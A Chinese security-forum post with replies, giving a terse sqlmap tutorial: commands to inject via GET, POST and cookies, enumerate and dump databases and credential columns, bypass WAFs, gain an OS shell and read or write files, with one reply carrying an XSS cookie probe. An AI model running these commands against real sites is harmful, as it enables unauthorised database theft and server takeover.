用户
搜索

[精品转载] sqlmap简易教程

  • TA的每日心情
    擦汗
    2017-9-27 12:58
  • 签到天数: 37 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-白帽高手

    Rank: 6Rank: 6

    240

    主题

    591

    帖子

    1253

    魔法币
    收听
    1
    粉丝
    115
    注册时间
    2015-9-23

    春秋文阁核心白帽i春秋签约作者热心助人奖

    发表于 2015-10-26 10:56:23 178988
    本帖最后由 疯子 于 2015-10-26 10:58 编辑

    最近看到很多大牛发sqlmap的视频教程。


    然后偶就屁颠屁颠滚去下了一个,然后尼玛,一连从头看到尾。。。。。。各种科普啊,看视频有点浪费时间。

    各位别去被坑爹了,来个sqlmap 简易教程算了,何必浪费看视频的时间。
    sqlmap 再牛逼也就是个python的脚本,脚本再牛逼也得有–help -hh

    所以第一件事当然是滚去看帮助文档。
    sqlmap -hh
    我操。。。。。。。这么多英文,多少只草泥马在心中奔腾,咋办,硬着头皮看呗,有些人头皮硬不了咋办,简单,来,哥教你简单的


    注入分法不同,种类不同,来个简单的分类:
    1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
    2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
    3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2

    好,区分完毕再来后续的
    需要数据库好:–dbs

    得到数据库名称xxx,需要表: -D xxx –tables
    得到表名xxxx,需要段:-D xxx -T xxxx –columns

    得到段内有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump

    那么我们来理解一下,-D -T -C 是干吗的,当然就是知道其名称,指定使用其。
    –dbs –tables –columns 是干吗的,当然就是不知道名称,列出来呗
    –dump 那自然就是字面意思,类似于导出数据的行为

    其实注入有了上面这几个命令,妥妥的够用了,不过还需要绕waf –tamper=”"
    注入被识别出来是工具,断开咋办–user-agent=”"
    再多牛逼的功能都是慢慢积累出来的,别想一口吃成胖子


    好,跑数据库就是这么简单,于是呢来一个稍微有点干货的例子:

    http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷贝post数据,很麻烦,我想让sqlmap自动跑post注入

    sqlmap -u “http://www.xxx.com/login.asp” –forms

    很好,上面的命令成功的帮我跑了post注入,并且找到了post的注入点jjj=123

    sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs

    于是我用上面的命令看看数据库

    sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
    顺便看看当前用户是不是dba

    sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a
    用了上面的命令 -a能得到什么呢:自己去看帮助吧。


    帮你筛选了一下,-a下面的那些命令是用来看用户,看主机,看权限的。


    后来呢,我发现权限还是挺高的,同时呢,我跑出来了数据库名称kkk
    sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables


    同时我找到了网站路径,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以执行系统命令,同时还发现了牛逼的xpcmdshell –os-shell
    以及很多牛逼的文件操作命令–file-xx 这些命令在需要用的时候使用就是了,会给你带来意想不到的惊喜


    与此同时,我发现tables里面没有我想要的东西,我也找不到合适的内容,咋办呢,心一横,我决定把所有的数据库内容跑出来自己找,于是我这么做:
    sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all


    然后牛逼的sqlmap就开始跑啊跑,然后紧接着我的蛋就碎了,尼玛,sqlmap一会就问你一次要不要破解密码,要不要这个,要不要那个,我和我的小朋友们都想擦你妹夫,功夫不负有心人,我又看见了一个命令 –batch 可以自动选择sqlmap默认选项


    于是,我可以和我的小朋友们玩耍去了,再也不用看着sqlmap拖库了。


    总结下来,帮助文档还是很重要的,多看看,总会有些收获:


    为了避免各位看英文看到吐,大概总结下:


    Target: 字面意思,目标,那么就是确定目标的


    Request: 字面意思,请求,就是定义请求内容的,比如post数据,http头,cookie注入,http头污染等等


    Optimization:字面意思,调节性能,等等


    Injection: 字面意思,注入的设置内容基本在这里,比如指定注入点,指定db,指定系统,等等


    Detection:
    基本就是用在确认注入范围,寻找注入点区域,这些
    Technique:
    基本用在确定注入手段,以及攻击方式


    Fingerprint:
    基本用在指纹识别,用的很少


    Enumeration:
    枚举信息,主要用在注入中,很重要,很常用


    Brute force:
    用来爆破,其实主要是枚举tables columns用的


    User-defined function injection:
    现在只有udf提权,以及指定一些自己定义的sqlmap脚本用,高端使用,求大牛指点


    File system access
    主要是文件读取,文件写入


    Operating system access
    主要用在对系统操作,例如os-shell 以及 后续的连接metasploit 实现后渗透攻击


    windows registry access
    基本就是注册表操作了


    General
    字面意思,综合的内容,一些特殊的功能实现,我在这里找到了crawl batch这些非常好用的参数


    Miscellaneous
    目测高端应用,还没怎么用过,求大神指教


    如上面总结的,大概红字就是常用的命令,剩下的不常用里面也有很多很不错,在特殊情况下适用的内容,反正本贴科普而已。

    字有点多,想看的菜鸟朋友认真看下来应该会有些收获,菜鸟们如果有什么其他的奇技淫巧,还希望分享1、2 共同进步!!







    本帖被以下淘专辑推荐:

    同样是一个B,往北走是NB,往南走就是SB,所以人生的方向很重要!
    评论一下,证明我已经看过这篇文章啦
    使用道具 举报 回复
    发表于 2015-10-26 12:24:50
    飘过   留着有时间看
    使用道具 举报 回复
    可以 简单粗暴 我喜欢
    使用道具 举报 回复
    这个好,脱水版
    使用道具 举报 回复
    支持一下~
    使用道具 举报 回复
    发表于 2017-2-6 19:18:46
    学习学习
    使用道具 举报 回复
    发表于 2015-10-26 16:52:35
    人生苦短,快用python!
    blog:github.so
    使用道具 举报 回复
    发表于 2015-10-26 17:04:25
    带队飘过。。。
    我就是要打你的cookies
    <script>alert(document.cookie)</script>
    使用道具 举报 回复
    发表于 2015-10-26 20:00:35
    学习学习,
    使用道具 举报 回复
    发表于 2016-1-25 17:35:46
    挖一个sqlmap的教程
    该会员没有填写今日想说内容.
    使用道具 举报 回复
    发表于 2016-1-26 23:08:08

    学习学习
    使用道具 举报 回复
    发表于 2016-1-27 15:34:10
    像这样的干货真的不多,谢谢楼主分享。期待楼主分享更多的经验
    使用道具 举报 回复
    坏蛋 管理员 欢迎大家来春秋群找我玩 秦 楚 燕 魏 齐 赵 春秋文阁
    13#
    发表于 2016-1-27 15:35:02
    lansedino 发表于 2016-1-27 15:34
    像这样的干货真的不多,谢谢楼主分享。期待楼主分享更多的经验

    他的干货很多的,你们要督促他都拿出来
    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!
    投稿请加QQ:780876774。

    i春秋—楚:713729706
    i春秋—魏:687133802
    网安交流群:820783253
    使用道具 举报 回复
    该会员没有填写今日想说内容.
    使用道具 举报 回复
    发表于 2016-3-30 15:58:10
    感谢分享
    使用道具 举报 回复
    发表于 2016-6-1 16:28:45
    这个不支持不行啊
    使用道具 举报 回复
    发表于 2016-10-10 14:14:55
    学习
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册